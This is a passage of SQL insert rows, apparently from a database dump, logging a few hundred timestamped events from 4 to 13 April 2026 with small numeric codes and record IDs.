(28685, '2026-04-04 12:57:15', 1, 2055, 0, 1, 1),
(28686, '2026-04-04 14:18:50', 1, 2054, 0, 1, 1),
(28687, '2026-04-04 14:19:48', 1, 2058, 0, 1, 1),
(28688, '2026-04-04 14:20:11', 1, 2060, 0, 1, 1),
(28689, '2026-04-04 14:21:39', 1, 2055, 0, 1, 1),
(28690, '2026-04-04 14:21:39', 1, 2060, 0, 1, 1),
(28691, '2026-04-04 14:23:18', 1, 2064, 0, 1, 1),
(28692, '2026-04-04 14:30:31', 1, 2063, 0, 1, 1),
(28693, '2026-04-04 14:56:40', 1, 2055, 0, 1, 1),
(28694, '2026-04-04 15:29:27', 4, 2062, 0, 1, 1),
(28695, '2026-04-04 16:06:02', 4, 2055, 0, 1, 1),
(28696, '2026-04-04 16:06:07', 4, 2055, 0, 1, 1),
(28697, '2026-04-04 16:06:12', 4, 2055, 0, 1, 1),
(28698, '2026-04-04 16:06:16', 4, 2055, 0, 1, 1),
(28699, '2026-04-04 16:06:21', 4, 2055, 0, 1, 1),
(28700, '2026-04-04 16:06:26', 4, 2055, 0, 1, 1),
(28701, '2026-04-04 17:28:00', 1, 2062, 0, 1, 1),
(28702, '2026-04-04 21:28:23', 4, 2062, 0, 1, 1),
(28703, '2026-04-04 22:46:34', 1, 2062, 0, 1, 1),
(28704, '2026-04-04 22:46:38', 1, 2063, 0, 1, 1),
(28705, '2026-04-04 22:46:42', 1, 2061, 0, 1, 1),
(28706, '2026-04-04 23:36:42', 1, 2063, 0, 1, 1),
(28707, '2026-04-05 01:01:28', 1, 2055, 0, 1, 1),
(28708, '2026-04-05 02:04:38', 4, 2059, 0, 1, 1),
(28709, '2026-04-05 03:34:35', 4, 2062, 0, 1, 1),
(28710, '2026-04-05 06:56:21', 1, 2064, 0, 1, 1),
(28711, '2026-04-05 08:38:53', 1, 2060, 0, 1, 1),
(28712, '2026-04-05 08:58:27', 1, 2055, 0, 1, 1),
(28713, '2026-04-05 09:41:23', 4, 2062, 0, 1, 1),
(28714, '2026-04-05 14:18:49', 1, 2062, 0, 1, 1),
(28715, '2026-04-05 14:18:49', 1, 2058, 0, 1, 1),
(28716, '2026-04-05 14:18:51', 1, 2061, 0, 1, 1),
(28717, '2026-04-05 14:19:14', 1, 2060, 0, 1, 1),
(28718, '2026-04-05 14:20:33', 1, 2055, 0, 1, 1),
(28719, '2026-04-05 14:21:51', 1, 2060, 0, 1, 1),
(28720, '2026-04-05 14:22:27', 1, 2054, 0, 1, 1),
(28721, '2026-04-05 16:19:38', 4, 2062, 0, 1, 1),
(28722, '2026-04-05 16:48:23', 1, 2063, 0, 1, 1),
(28723, '2026-04-05 16:50:15', 1, 2062, 0, 1, 1),
(28724, '2026-04-05 16:51:07', 1, 2062, 0, 1, 1),
(28725, '2026-04-05 22:09:08', 4, 2059, 0, 1, 1),
(28726, '2026-04-05 22:12:04', 1, 2060, 0, 1, 1),
(28727, '2026-04-05 22:26:25', 4, 2062, 0, 1, 1),
(28728, '2026-04-05 22:31:57', 1, 2063, 0, 1, 1),
(28729, '2026-04-05 22:42:42', 1, 2054, 0, 1, 1),
(28730, '2026-04-06 00:03:43', 1, 2063, 0, 1, 1),
(28731, '2026-04-06 04:23:58', 4, 2062, 0, 1, 1),
(28732, '2026-04-06 06:51:28', 1, 2058, 0, 1, 1),
(28733, '2026-04-06 06:55:29', 1, 2062, 0, 1, 1),
(28734, '2026-04-06 07:03:29', 1, 2060, 0, 1, 1),
(28735, '2026-04-06 08:12:59', 1, 2058, 0, 1, 1),
(28736, '2026-04-06 08:13:03', 1, 2062, 0, 1, 1),
(28737, '2026-04-06 08:17:00', 1, 2060, 0, 1, 1),
(28738, '2026-04-06 10:19:43', 1, 2059, 0, 1, 1),
(28739, '2026-04-06 10:24:40', 1, 2058, 0, 1, 1),
(28740, '2026-04-06 10:28:41', 1, 2062, 0, 1, 1),
(28741, '2026-04-06 10:36:41', 1, 2060, 0, 1, 1),
(28742, '2026-04-06 10:39:13', 4, 2062, 0, 1, 1),
(28743, '2026-04-06 12:08:16', 1, 2058, 0, 1, 1),
(28744, '2026-04-06 12:08:16', 1, 2062, 0, 1, 1),
(28745, '2026-04-06 12:12:16', 1, 2060, 0, 1, 1),
(28746, '2026-04-06 12:36:14', 1, 2059, 0, 1, 1),
(28747, '2026-04-06 12:42:47', 1, 2064, 0, 1, 1),
(28748, '2026-04-06 13:00:29', 1, 2062, 0, 1, 1),
(28749, '2026-04-06 14:05:57', 1, 2060, 0, 1, 1),
(28750, '2026-04-06 14:19:32', 1, 2061, 0, 1, 1),
(28751, '2026-04-06 14:20:44', 1, 2060, 0, 1, 1),
(28752, '2026-04-06 14:21:15', 1, 2060, 0, 1, 1),
(28753, '2026-04-06 14:22:27', 1, 2055, 0, 1, 1),
(28754, '2026-04-06 14:23:27', 1, 2054, 0, 1, 1),
(28755, '2026-04-06 15:08:07', 1, 2053, 0, 1, 1),
(28756, '2026-04-06 15:39:59', 1, 2058, 0, 1, 1),
(28757, '2026-04-06 16:06:38', 1, 2062, 0, 1, 1),
(28758, '2026-04-06 16:07:37', 1, 2062, 0, 1, 1),
(28759, '2026-04-06 17:31:08', 4, 2062, 0, 1, 1),
(28760, '2026-04-06 21:24:19', 1, 2064, 0, 1, 1),
(28761, '2026-04-06 22:09:01', 1, 2062, 0, 1, 1),
(28762, '2026-04-07 00:12:36', 4, 2062, 0, 1, 1),
(28763, '2026-04-07 01:30:22', 1, 2061, 0, 1, 1),
(28764, '2026-04-07 02:40:43', 1, 2053, 0, 1, 1),
(28765, '2026-04-07 03:10:18', 1, 2064, 0, 1, 1),
(28766, '2026-04-07 03:41:17', 1, 2053, 0, 1, 1),
(28767, '2026-04-07 06:34:59', 1, 2063, 0, 1, 1),
(28768, '2026-04-07 06:43:27', 4, 2062, 0, 1, 1),
(28769, '2026-04-07 09:26:21', 1, 2061, 0, 1, 1),
(28770, '2026-04-07 12:32:58', 1, 2062, 0, 1, 1),
(28771, '2026-04-07 13:33:32', 4, 2062, 0, 1, 1),
(28772, '2026-04-07 13:52:38', 1, 2060, 0, 1, 1),
(28773, '2026-04-07 14:16:29', 1, 2063, 0, 1, 1),
(28774, '2026-04-07 14:19:05', 1, 2060, 0, 1, 1),
(28775, '2026-04-07 14:20:20', 1, 2054, 0, 1, 1),
(28776, '2026-04-07 14:20:58', 1, 2055, 0, 1, 1),
(28777, '2026-04-07 14:20:58', 1, 2058, 0, 1, 1),
(28778, '2026-04-07 14:22:23', 1, 2062, 0, 1, 1),
(28779, '2026-04-07 14:23:06', 1, 2060, 0, 1, 1),
(28780, '2026-04-07 15:32:03', 1, 2061, 0, 1, 1),
(28781, '2026-04-07 17:14:32', 1, 2062, 0, 1, 1),
(28782, '2026-04-07 17:14:50', 1, 2062, 0, 1, 1),
(28783, '2026-04-07 17:47:54', 1, 2064, 0, 1, 1),
(28784, '2026-04-07 17:47:56', 1, 2064, 0, 1, 1),
(28785, '2026-04-07 17:47:58', 1, 2064, 0, 1, 1),
(28786, '2026-04-07 17:48:01', 1, 2063, 0, 1, 1),
(28787, '2026-04-07 17:48:03', 1, 2062, 0, 1, 1),
(28788, '2026-04-07 17:48:05', 1, 2061, 0, 1, 1),
(28789, '2026-04-07 17:48:08', 1, 2060, 0, 1, 1),
(28790, '2026-04-07 17:48:10', 1, 2059, 0, 1, 1),
(28791, '2026-04-07 20:19:52', 4, 2062, 0, 1, 1),
(28792, '2026-04-07 20:56:43', 1, 2064, 0, 1, 1),
(28793, '2026-04-07 21:03:21', 1, 2063, 0, 1, 1),
(28794, '2026-04-07 21:12:39', 1, 2064, 0, 1, 1),
(28795, '2026-04-07 21:13:45', 1, 2061, 0, 1, 1),
(28796, '2026-04-07 21:33:15', 1, 2063, 0, 1, 1),
(28797, '2026-04-07 21:46:44', 1, 2059, 0, 1, 1),
(28798, '2026-04-07 21:46:59', 1, 2058, 0, 1, 1),
(28799, '2026-04-07 22:12:43', 1, 2062, 0, 1, 1),
(28800, '2026-04-08 00:20:20', 1, 2055, 0, 1, 1),
(28801, '2026-04-08 00:20:40', 1, 2054, 0, 1, 1),
(28802, '2026-04-08 00:20:49', 1, 2060, 0, 1, 1),
(28803, '2026-04-08 00:22:50', 1, 2053, 0, 1, 1),
(28804, '2026-04-08 02:59:30', 4, 2062, 0, 1, 1),
(28805, '2026-04-08 09:51:34', 4, 2062, 0, 1, 1),
(28806, '2026-04-08 14:21:10', 1, 2054, 0, 1, 1),
(28807, '2026-04-08 14:21:45', 1, 2058, 0, 1, 1),
(28808, '2026-04-08 14:22:47', 1, 2061, 0, 1, 1),
(28809, '2026-04-08 14:23:48', 1, 2060, 0, 1, 1),
(28810, '2026-04-08 14:23:48', 1, 2055, 0, 1, 1),
(28811, '2026-04-08 14:24:53', 1, 2060, 0, 1, 1),
(28812, '2026-04-08 16:40:03', 1, 2054, 0, 1, 1),
(28813, '2026-04-08 16:48:00', 1, 2062, 0, 1, 1),
(28814, '2026-04-08 16:48:28', 1, 2062, 0, 1, 1),
(28815, '2026-04-08 16:57:55', 4, 2062, 0, 1, 1),
(28816, '2026-04-08 17:02:40', 1, 2063, 0, 1, 1),
(28817, '2026-04-08 17:10:30', 1, 2059, 0, 1, 1),
(28818, '2026-04-08 17:12:07', 4, 2059, 0, 1, 1),
(28819, '2026-04-08 17:20:46', 1, 2055, 0, 1, 1),
(28820, '2026-04-08 18:20:18', 1, 2055, 0, 1, 1),
(28821, '2026-04-08 22:18:14', 1, 2055, 0, 1, 1),
(28822, '2026-04-08 22:59:28', 1, 2064, 0, 1, 1),
(28823, '2026-04-08 23:10:06', 1, 2058, 0, 1, 1),
(28824, '2026-04-08 23:30:49', 1, 2064, 0, 1, 1),
(28825, '2026-04-08 23:43:53', 4, 2062, 0, 1, 1),
(28826, '2026-04-08 23:50:07', 1, 2060, 0, 1, 1),
(28827, '2026-04-09 02:20:22', 1, 2058, 0, 1, 1),
(28828, '2026-04-09 05:05:30', 1, 2064, 0, 1, 1),
(28829, '2026-04-09 05:27:51', 4, 2059, 0, 1, 1),
(28830, '2026-04-09 05:27:56', 4, 2054, 0, 1, 1),
(28831, '2026-04-09 05:30:01', 1, 2064, 0, 1, 1),
(28832, '2026-04-09 05:30:05', 1, 2064, 0, 1, 1),
(28833, '2026-04-09 05:30:08', 1, 2064, 0, 1, 1),
(28834, '2026-04-09 05:30:16', 1, 2063, 0, 1, 1),
(28835, '2026-04-09 05:30:20', 1, 2062, 0, 1, 1),
(28836, '2026-04-09 05:30:35', 1, 2061, 0, 1, 1),
(28837, '2026-04-09 05:30:57', 1, 2055, 0, 1, 1),
(28838, '2026-04-09 05:31:00', 1, 2058, 0, 1, 1),
(28839, '2026-04-09 05:31:03', 1, 2059, 0, 1, 1),
(28840, '2026-04-09 05:31:06', 1, 2060, 0, 1, 1),
(28841, '2026-04-09 05:34:10', 1, 2062, 0, 1, 1),
(28842, '2026-04-09 06:19:57', 4, 2061, 9104, 1, 1),
(28843, '2026-04-09 06:39:35', 4, 2062, 0, 1, 1),
(28844, '2026-04-09 06:55:20', 4, 2061, 9106, 1, 1),
(28845, '2026-04-09 08:39:14', 1, 2053, 0, 1, 1),
(28846, '2026-04-09 08:52:37', 1, 2064, 0, 1, 1),
(28847, '2026-04-09 13:16:30', 1, 2054, 0, 1, 1),
(28848, '2026-04-09 14:01:38', 4, 2062, 0, 1, 1),
(28849, '2026-04-09 14:18:43', 1, 2062, 0, 1, 1),
(28850, '2026-04-09 14:19:17', 1, 2060, 0, 1, 1),
(28851, '2026-04-09 14:19:24', 1, 2060, 0, 1, 1),
(28852, '2026-04-09 14:20:13', 1, 2054, 0, 1, 1),
(28853, '2026-04-09 14:20:16', 1, 2064, 0, 1, 1),
(28854, '2026-04-09 14:20:17', 1, 2055, 0, 1, 1),
(28855, '2026-04-09 14:20:31', 1, 2064, 0, 1, 1),
(28856, '2026-04-09 14:21:13', 1, 2058, 0, 1, 1),
(28857, '2026-04-09 14:41:16', 1, 2062, 0, 1, 1),
(28858, '2026-04-09 15:29:21', 1, 2061, 0, 1, 1),
(28859, '2026-04-09 15:29:25', 1, 2061, 0, 1, 1),
(28860, '2026-04-09 16:27:37', 1, 2062, 0, 1, 1),
(28861, '2026-04-09 16:28:30', 1, 2062, 0, 1, 1),
(28862, '2026-04-09 21:09:28', 4, 2062, 0, 1, 1),
(28863, '2026-04-09 23:36:30', 1, 2053, 0, 1, 1),
(28864, '2026-04-10 00:04:02', 1, 2054, 0, 1, 1),
(28865, '2026-04-10 02:16:55', 1, 2053, 0, 1, 1),
(28866, '2026-04-10 02:41:11', 1, 2054, 0, 1, 1),
(28867, '2026-04-10 06:27:43', 1, 2053, 0, 1, 1),
(28868, '2026-04-10 07:12:38', 1, 2059, 0, 1, 1),
(28869, '2026-04-10 07:23:28', 1, 2061, 0, 1, 1),
(28870, '2026-04-10 09:21:22', 4, 2062, 0, 1, 1),
(28871, '2026-04-10 11:48:19', 1, 2055, 0, 1, 1),
(28872, '2026-04-10 12:20:39', 1, 2053, 0, 1, 1),
(28873, '2026-04-10 13:56:14', 1, 2059, 0, 1, 1),
(28874, '2026-04-10 14:22:45', 1, 2060, 0, 1, 1),
(28875, '2026-04-10 14:23:35', 1, 2061, 0, 1, 1),
(28876, '2026-04-10 14:23:35', 1, 2054, 0, 1, 1),
(28877, '2026-04-10 14:23:36', 1, 2061, 0, 1, 1),
(28878, '2026-04-10 14:24:11', 1, 2055, 0, 1, 1),
(28879, '2026-04-10 14:24:38', 1, 2058, 0, 1, 1),
(28880, '2026-04-10 14:25:31', 1, 2060, 0, 1, 1),
(28881, '2026-04-10 16:25:50', 4, 2062, 0, 1, 1),
(28882, '2026-04-10 16:50:29', 1, 2062, 0, 1, 1),
(28883, '2026-04-10 16:51:15', 1, 2062, 0, 1, 1),
(28884, '2026-04-10 17:27:34', 1, 2064, 0, 1, 1),
(28885, '2026-04-10 17:37:55', 1, 2061, 0, 1, 1),
(28886, '2026-04-10 18:29:23', 1, 2055, 0, 1, 1),
(28887, '2026-04-10 21:01:14', 1, 2062, 0, 1, 1),
(28888, '2026-04-10 21:01:34', 1, 2063, 0, 1, 1),
(28889, '2026-04-10 21:04:17', 1, 2055, 0, 1, 1),
(28890, '2026-04-10 21:08:36', 1, 2064, 0, 1, 1),
(28891, '2026-04-10 21:14:20', 1, 2060, 0, 1, 1),
(28892, '2026-04-10 21:14:23', 1, 2060, 0, 1, 1),
(28893, '2026-04-10 21:18:03', 1, 2059, 0, 1, 1),
(28894, '2026-04-10 21:21:23', 1, 2058, 0, 1, 1),
(28895, '2026-04-10 21:24:15', 1, 2053, 0, 1, 1),
(28896, '2026-04-10 21:27:08', 1, 2060, 0, 1, 1),
(28897, '2026-04-10 21:58:20', 1, 2054, 0, 1, 1),
(28898, '2026-04-10 22:02:10', 1, 2054, 0, 1, 1),
(28899, '2026-04-10 22:02:12', 1, 2061, 0, 1, 1),
(28900, '2026-04-10 23:17:32', 4, 2062, 0, 1, 1),
(28901, '2026-04-11 03:32:56', 1, 2061, 0, 1, 1),
(28902, '2026-04-11 04:15:34', 4, 2054, 0, 1, 1),
(28903, '2026-04-11 04:15:44', 4, 2054, 0, 1, 1),
(28904, '2026-04-11 04:15:49', 4, 2054, 0, 1, 1),
(28905, '2026-04-11 04:15:54', 4, 2054, 0, 1, 1),
(28906, '2026-04-11 04:15:57', 4, 2054, 0, 1, 1),
(28907, '2026-04-11 04:16:00', 4, 2054, 0, 1, 1),
(28908, '2026-04-11 04:16:08', 4, 2054, 0, 1, 1),
(28909, '2026-04-11 04:16:10', 4, 2054, 0, 1, 1),
(28910, '2026-04-11 04:16:14', 4, 2054, 0, 1, 1),
(28911, '2026-04-11 04:16:36', 4, 2054, 0, 1, 1),
(28912, '2026-04-11 04:16:39', 4, 2054, 0, 1, 1),
(28913, '2026-04-11 04:17:00', 4, 2054, 0, 1, 1),
(28914, '2026-04-11 04:17:21', 4, 2054, 0, 1, 1),
(28915, '2026-04-11 04:17:43', 4, 2054, 0, 1, 1),
(28916, '2026-04-11 06:17:36', 4, 2062, 0, 1, 1),
(28917, '2026-04-11 06:59:28', 1, 2060, 0, 1, 1),
(28918, '2026-04-11 06:59:31', 1, 2059, 0, 1, 1),
(28919, '2026-04-11 08:45:43', 1, 2058, 0, 1, 1),
(28920, '2026-04-11 08:45:47', 1, 2053, 0, 1, 1),
(28921, '2026-04-11 13:32:17', 1, 2060, 0, 1, 1),
(28922, '2026-04-11 13:32:21', 1, 2060, 0, 1, 1),
(28923, '2026-04-11 13:41:03', 1, 2060, 0, 1, 1),
(28924, '2026-04-11 14:05:33', 1, 2061, 0, 1, 1),
(28925, '2026-04-11 14:10:34', 4, 2062, 0, 1, 1),
(28926, '2026-04-11 14:19:12', 1, 2060, 0, 1, 1),
(28927, '2026-04-11 14:19:15', 1, 2060, 0, 1, 1),
(28928, '2026-04-11 14:23:05', 1, 2055, 0, 1, 1),
(28929, '2026-04-11 14:23:12', 1, 2054, 0, 1, 1),
(28930, '2026-04-11 14:23:12', 1, 2058, 0, 1, 1),
(28931, '2026-04-11 15:06:12', 1, 2061, 0, 1, 1),
(28932, '2026-04-11 16:20:19', 1, 2061, 0, 1, 1),
(28933, '2026-04-11 16:21:10', 1, 2062, 0, 1, 1),
(28934, '2026-04-11 16:21:47', 1, 2062, 0, 1, 1),
(28935, '2026-04-11 16:32:41', 1, 2062, 0, 1, 1),
(28936, '2026-04-11 16:32:47', 1, 2062, 0, 1, 1),
(28937, '2026-04-11 16:32:52', 1, 2062, 0, 1, 1),
(28938, '2026-04-11 16:33:23', 1, 2062, 0, 1, 1),
(28939, '2026-04-11 17:30:30', 1, 2062, 0, 1, 1),
(28940, '2026-04-11 17:31:21', 1, 2062, 0, 1, 1),
(28941, '2026-04-11 17:32:23', 1, 2062, 0, 1, 1),
(28942, '2026-04-11 17:43:58', 1, 2062, 0, 1, 1),
(28943, '2026-04-11 17:49:27', 1, 2062, 0, 1, 1),
(28944, '2026-04-11 17:53:27', 1, 2062, 0, 1, 1),
(28945, '2026-04-11 18:37:57', 1, 2061, 0, 1, 1),
(28946, '2026-04-11 19:22:47', 1, 2053, 0, 1, 1),
(28947, '2026-04-11 20:45:04', 1, 2061, 0, 1, 1),
(28948, '2026-04-11 20:50:11', 1, 2061, 0, 1, 1),
(28949, '2026-04-11 21:08:47', 1, 2061, 0, 1, 1),
(28950, '2026-04-11 21:24:11', 1, 2061, 0, 1, 1),
(28951, '2026-04-11 21:30:33', 1, 2061, 0, 1, 1),
(28952, '2026-04-11 22:16:38', 4, 2062, 0, 1, 1),
(28953, '2026-04-11 22:55:55', 1, 2061, 0, 1, 1),
(28954, '2026-04-11 22:55:59', 1, 2062, 0, 1, 1),
(28955, '2026-04-11 22:56:03', 1, 2063, 0, 1, 1),
(28956, '2026-04-11 23:51:35', 1, 2058, 0, 1, 1),
(28957, '2026-04-12 05:49:53', 1, 2061, 0, 1, 1),
(28958, '2026-04-12 06:20:31', 4, 2062, 0, 1, 1),
(28959, '2026-04-12 06:45:53', 1, 2055, 0, 1, 1),
(28960, '2026-04-12 08:02:51', 1, 2058, 0, 1, 1),
(28961, '2026-04-12 11:11:47', 1, 2061, 0, 1, 1),
(28962, '2026-04-12 11:12:36', 1, 2055, 0, 1, 1),
(28963, '2026-04-12 11:48:14', 1, 2064, 0, 1, 1),
(28964, '2026-04-12 12:11:22', 1, 2061, 0, 1, 1),
(28965, '2026-04-12 12:11:57', 1, 2063, 0, 1, 1),
(28966, '2026-04-12 12:12:29', 1, 2061, 0, 1, 1),
(28967, '2026-04-12 12:14:08', 1, 2061, 0, 1, 1),
(28968, '2026-04-12 12:18:07', 1, 2061, 0, 1, 1),
(28969, '2026-04-12 12:22:35', 1, 2061, 0, 1, 1),
(28970, '2026-04-12 12:28:55', 1, 2061, 0, 1, 1),
(28971, '2026-04-12 12:31:26', 4, 2054, 0, 1, 1),
(28972, '2026-04-12 13:00:25', 1, 2055, 0, 1, 1),
(28973, '2026-04-12 13:12:24', 1, 2059, 0, 1, 1),
(28974, '2026-04-12 14:17:24', 1, 2054, 0, 1, 1),
(28975, '2026-04-12 14:19:55', 1, 2060, 0, 1, 1),
(28976, '2026-04-12 14:19:59', 1, 2055, 0, 1, 1),
(28977, '2026-04-12 14:20:21', 1, 2060, 0, 1, 1),
(28978, '2026-04-12 14:20:42', 1, 2060, 0, 1, 1),
(28979, '2026-04-12 14:28:32', 4, 2062, 0, 1, 1),
(28980, '2026-04-12 16:56:28', 1, 2063, 0, 1, 1),
(28981, '2026-04-12 18:52:03', 1, 2058, 0, 1, 1),
(28982, '2026-04-12 19:21:43', 4, 2059, 0, 1, 1),
(28983, '2026-04-12 19:21:48', 4, 2054, 0, 1, 1),
(28984, '2026-04-12 20:12:54', 1, 2060, 0, 1, 1),
(28985, '2026-04-12 20:28:04', 1, 2061, 0, 1, 1),
(28986, '2026-04-12 21:26:13', 1, 2054, 0, 1, 1),
(28987, '2026-04-12 21:26:22', 1, 2064, 0, 1, 1),
(28988, '2026-04-12 21:26:42', 1, 2062, 0, 1, 1),
(28989, '2026-04-12 22:39:36', 4, 2062, 0, 1, 1),
(28990, '2026-04-13 06:28:53', 1, 2063, 0, 1, 1),
(28991, '2026-04-13 06:52:22', 4, 2062, 0, 1, 1),
(28992, '2026-04-13 13:03:54', 1, 2064, 0, 1, 1),
(28993, '2026-04-13 14:11:07', 1, 2064, 0, 1, 1),
(28994, '2026-04-13 14:19:22', 1, 2060, 0, 1, 1),
(28995, '2026-04-13 14:20:47', 1, 2054, 0, 1, 1),
(28996, '2026-04-13 14:21:46', 1, 2058, 0, 1, 1),
(28997, '2026-04-13 14:22:45', 1, 2055, 0, 1, 1),
(28998, '2026-04-13 14:22:51', 1, 2060, 0, 1, 1),
(28999, '2026-04-13 14:58:49', 1, 2062, 0, 1, 1),
(29000, '2026-04-13 15:09:10', 1, 2064, 0, 1, 1),
(29001, '2026-04-13 15:09:18', 1, 2062, 0, 1, 1),
(29002, '2026-04-13 15:11:12', 4, 2062, 0, 1, 1),
(29003, '2026-04-13 15:11:49', 4, 2062, 0, 1, 1),
(29004, '2026-04-13 15:51:27', 1, 2061, 0, 1, 1),
(29005, '2026-04-13 16:16:25', 1, 2064, 0, 1, 1),
(29006, '2026-04-13 16:16:35', 1, 2064, 0, 1, 1),
(29007, '2026-04-13 16:16:39', 1, 2063, 0, 1, 1),
(29008, '2026-04-13 16:16:40', 1, 2062, 0, 1, 1),
(29009, '2026-04-13 16:16:40', 1, 2061, 0, 1, 1),
(29010, '2026-04-13 16:16:40', 1, 2059, 0, 1, 1),
(29011, '2026-04-13 16:16:40', 1, 2055, 0, 1, 1),
(29012, '2026-04-13 16:16:40', 1, 2058, 0, 1, 1),
(29013, '2026-04-13 16:16:41', 1, 2064, 0, 1, 1),
(29014, '2026-04-13 16:16:44', 1, 2064, 0, 1, 1),
(29015, '2026-04-13 16:16:44', 1, 2060, 0, 1, 1),
(29016, '2026-04-13 16:16:46', 1, 2064, 0, 1, 1),
(29017, '2026-04-13 16:16:47', 1, 2063, 0, 1, 1),
(29018, '2026-04-13 16:16:47', 1, 2062, 0, 1, 1),
(29019, '2026-04-13 16:16:48', 1, 2062, 0, 1, 1),
(29020, '2026-04-13 16:16:48', 1, 2062, 0, 1, 1),
(29021, '2026-04-13 16:16:48', 1, 2062, 0, 1, 1),
(29022, '2026-04-13 16:16:48', 1, 2061, 0, 1, 1),
(29023, '2026-04-13 16:16:48', 1, 2055, 0, 1, 1),
(29024, '2026-04-13 16:16:48', 1, 2059, 0, 1, 1),
(29025, '2026-04-13 16:16:48', 1, 2058, 0, 1, 1),
(29026, '2026-04-13 16:16:49', 1, 2064, 0, 1, 1),
(29027, '2026-04-13 16:16:51', 1, 2062, 0, 1, 1),
(29028, '2026-04-13 16:16:51', 1, 2062, 0, 1, 1),
(29029, '2026-04-13 16:16:51', 1, 2062, 0, 1, 1),
(29030, '2026-04-13 16:16:51', 1, 2062, 0, 1, 1),
(29031, '2026-04-13 16:16:51', 1, 2060, 0, 1, 1),
(29032, '2026-04-13 16:16:53', 1, 2064, 0, 1, 1),
(29033, '2026-04-13 16:16:55', 1, 2062, 0, 1, 1),
(29034, '2026-04-13 16:16:55', 1, 2062, 0, 1, 1),
(29035, '2026-04-13 16:16:55', 1, 2061, 0, 1, 1),
(29036, '2026-04-13 16:16:55', 1, 2062, 0, 1, 1),
(29037, '2026-04-13 16:16:55', 1, 2055, 0, 1, 1),
(29038, '2026-04-13 16:16:55', 1, 2059, 0, 1, 1),
(29039, '2026-04-13 16:16:56', 1, 2058, 0, 1, 1),
(29040, '2026-04-13 16:16:56', 1, 2054, 0, 1, 1),
(29041, '2026-04-13 16:16:57', 1, 2062, 0, 1, 1),
(29042, '2026-04-13 16:16:58', 1, 2062, 0, 1, 1),
(29043, '2026-04-13 16:16:58', 1, 2062, 0, 1, 1),
(29044, '2026-04-13 16:16:58', 1, 2062, 0, 1, 1),
(29045, '2026-04-13 16:16:58', 1, 2060, 0, 1, 1),
(29046, '2026-04-13 16:16:59', 1, 2064, 0, 1, 1),
(29047, '2026-04-13 16:16:59', 1, 2064, 0, 1, 1),
(29048, '2026-04-13 16:16:59', 1, 2064, 0, 1, 1),
(29049, '2026-04-13 16:16:59', 1, 2064, 0, 1, 1),
(29050, '2026-04-13 16:16:59', 1, 2064, 0, 1, 1),
(29051, '2026-04-13 16:17:00', 1, 2058, 0, 1, 1),
(29052, '2026-04-13 16:17:00', 1, 2058, 0, 1, 1),
(29053, '2026-04-13 16:17:00', 1, 2058, 0, 1, 1),
(29054, '2026-04-13 16:17:00', 1, 2058, 0, 1, 1),
(29055, '2026-04-13 16:17:01', 1, 2062, 0, 1, 1),
(29056, '2026-04-13 16:17:01', 1, 2062, 0, 1, 1),
(29057, '2026-04-13 16:17:06', 1, 2058, 0, 1, 1),
(29058, '2026-04-13 16:17:06', 1, 2064, 0, 1, 1),
(29059, '2026-04-13 16:17:06', 1, 2058, 0, 1, 1),
(29060, '2026-04-13 16:17:06', 1, 2064, 0, 1, 1),
(29061, '2026-04-13 16:17:06', 1, 2058, 0, 1, 1),
(29062, '2026-04-13 16:17:06', 1, 2058, 0, 1, 1),
(29063, '2026-04-13 16:17:07', 1, 2062, 0, 1, 1),
(29064, '2026-04-13 16:17:11', 1, 2058, 0, 1, 1),
(29065, '2026-04-13 16:17:11', 1, 2058, 0, 1, 1),
(29066, '2026-04-13 16:17:11', 1, 2058, 0, 1, 1),
(29067, '2026-04-13 16:17:11', 1, 2058, 0, 1, 1),
(29068, '2026-04-13 16:17:11', 1, 2058, 0, 1, 1),
(29069, '2026-04-13 16:17:11', 1, 2058, 0, 1, 1),
(29070, '2026-04-13 16:17:11', 1, 2058, 0, 1, 1),
(29071, '2026-04-13 16:17:12', 1, 2054, 0, 1, 1),
(29072, '2026-04-13 16:17:12', 1, 2054, 0, 1, 1),
(29073, '2026-04-13 16:17:13', 1, 2054, 0, 1, 1),
(29074, '2026-04-13 16:17:13', 1, 2054, 0, 1, 1),
(29075, '2026-04-13 16:17:13', 1, 2054, 0, 1, 1),
(29076, '2026-04-13 16:17:13', 1, 2054, 0, 1, 1),
(29077, '2026-04-13 16:17:13', 1, 2054, 0, 1, 1),
(29078, '2026-04-13 16:17:13', 1, 2054, 0, 1, 1),
(29079, '2026-04-13 16:17:17', 1, 2054, 0, 1, 1),
(29080, '2026-04-13 16:17:17', 1, 2054, 0, 1, 1),
(29081, '2026-04-13 16:17:17', 1, 2054, 0, 1, 1),
(29082, '2026-04-13 16:17:27', 1, 2054, 0, 1, 1),
(29083, '2026-04-13 16:17:27', 1, 2054, 0, 1, 1),
(29084, '2026-04-13 16:17:28', 1, 2054, 0, 1, 1),
(29085, '2026-04-13 16:42:39', 1, 2061, 0, 1, 1),
(29086, '2026-04-13 16:42:51', 1, 2062, 0, 1, 1),
(29087, '2026-04-13 16:43:45', 1, 2062, 0, 1, 1),
(29088, '2026-04-13 18:15:08', 1, 2053, 0, 1, 1),
(29089, '2026-04-13 18:19:10', 4, 2054, 0, 1, 1),
(29090, '2026-04-13 18:26:45', 1, 2062, 0, 1, 1),
(29091, '2026-04-13 18:34:09', 1, 2062, 0, 1, 1),
(29092, '2026-04-13 18:34:45', 1, 2061, 0, 1, 1),
(29093, '2026-04-13 18:35:58', 1, 2062, 0, 1, 1),
(29094, '2026-04-13 18:38:03', 1, 2062, 0, 1, 1),
(29095, '2026-04-13 19:16:23', 1, 2058, 0, 1, 1),
(29096, '2026-04-13 19:38:28', 1, 2061, 0, 1, 1),
(29097, '2026-04-13 20:54:38', 1, 2061, 0, 1, 1),
(29098, '2026-04-13 21:15:19', 1, 2062, 0, 1, 1),
(29099, '2026-04-13 21:17:03', 1, 2059, 0, 1, 1),
(29100, '2026-04-13 21:18:29', 1, 2062, 0, 1, 1),
(29101, '2026-04-13 21:19:24', 1, 2062, 0, 1, 1),
(29102, '2026-04-13 21:20:08', 1, 2062, 0, 1, 1),
(29103, '2026-04-13 21:39:51', 1, 2061, 0, 1, 1),
(29104, '2026-04-13 21:42:35', 1, 2061, 0, 1, 1),
(29105, '2026-04-13 21:49:45', 1, 2061, 0, 1, 1),
(29106, '2026-04-13 21:56:58', 1, 2061, 0, 1, 1),
(29107, '2026-04-13 22:01:46', 1, 2061, 0, 1, 1),
(29108, '2026-04-13 22:11:00', 1, 2062, 0, 1, 1),
(29109, '2026-04-13 22:11:33', 1, 2062, 0, 1, 1),
(29110, '2026-04-13 22:20:09', 1, 2061, 0, 1, 1),
(29111, '2026-04-13 22:20:16', 1, 2061, 0, 1, 1),
(29112, '2026-04-13 22:21:09', 1, 2061, 0, 1, 1),
